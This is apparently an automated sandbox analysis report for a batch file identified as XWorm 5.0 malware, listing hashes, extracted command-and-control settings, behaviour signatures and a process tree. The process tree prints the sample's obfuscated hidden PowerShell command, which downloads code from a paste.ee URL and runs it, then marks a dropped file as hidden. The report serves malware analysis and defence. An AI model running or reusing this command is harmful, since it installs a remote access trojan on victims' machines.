Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
01/03/2025, 15:04
Static task
static1
Behavioral task
behavioral1
Sample
a.bat
Resource
win7-20241010-en
General
-
Target
a.bat
-
Size
156B
-
MD5
a4b2a54bebc39707a69977648a7a2b4f
-
SHA1
c27b1203244796cc064b00c472cec23cd16760ce
-
SHA256
5c14590059c2133806d881fa853b627b73748a20e529afaf4c7aa2a5fce97eb3
-
SHA512
669f71ff4b75184341eec4a1d78556b2e95ffecf8f14ac6a0467d8169e8bf5b991af443f5dd1786fbef244d483cebb10400374bed3a11ada805040c4f4eb32c1
Malware Config
Extracted
xworm
5.0
127.0.0.1:7000
192.168.221.1:7000
igtot.freemyip.com:7000
8pnN0UHcZ6GmIzoW
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000000749-16.dat family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 244 powershell.exe -
pid Process 244 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 244 powershell.exe 244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 244 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3112 wrote to memory of 244 3112 cmd.exe 85 PID 3112 wrote to memory of 244 3112 cmd.exe 85 PID 244 wrote to memory of 2740 244 powershell.exe 89 PID 244 wrote to memory of 2740 244 powershell.exe 89 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2740 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -w h -ExecutionPolicy Bypass -Command "(I'w'r('https://paste.ee/r/CLsmPBQU/0') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex');"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:244 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +r +s C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\Keys\slui.exe3⤵
- Views/modifies file attributes
PID:2740
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32KB
MD52768f53cb7968ded641dc0193dcf0969
SHA1c5472f734747e8be3ae884767834c8f634930b51
SHA25676ac6cc4834de9e6902bd19eac400bd15550ce6a53b841f6902076d4cce4a7fb
SHA51221624c1e214ed8dba7d0e41aa63902d8bc0f362d69d6a5bd38a484fdde1d460c657f14024a8c738f243ce194bdac26f451cf8d430400b92feda16d2e4732795a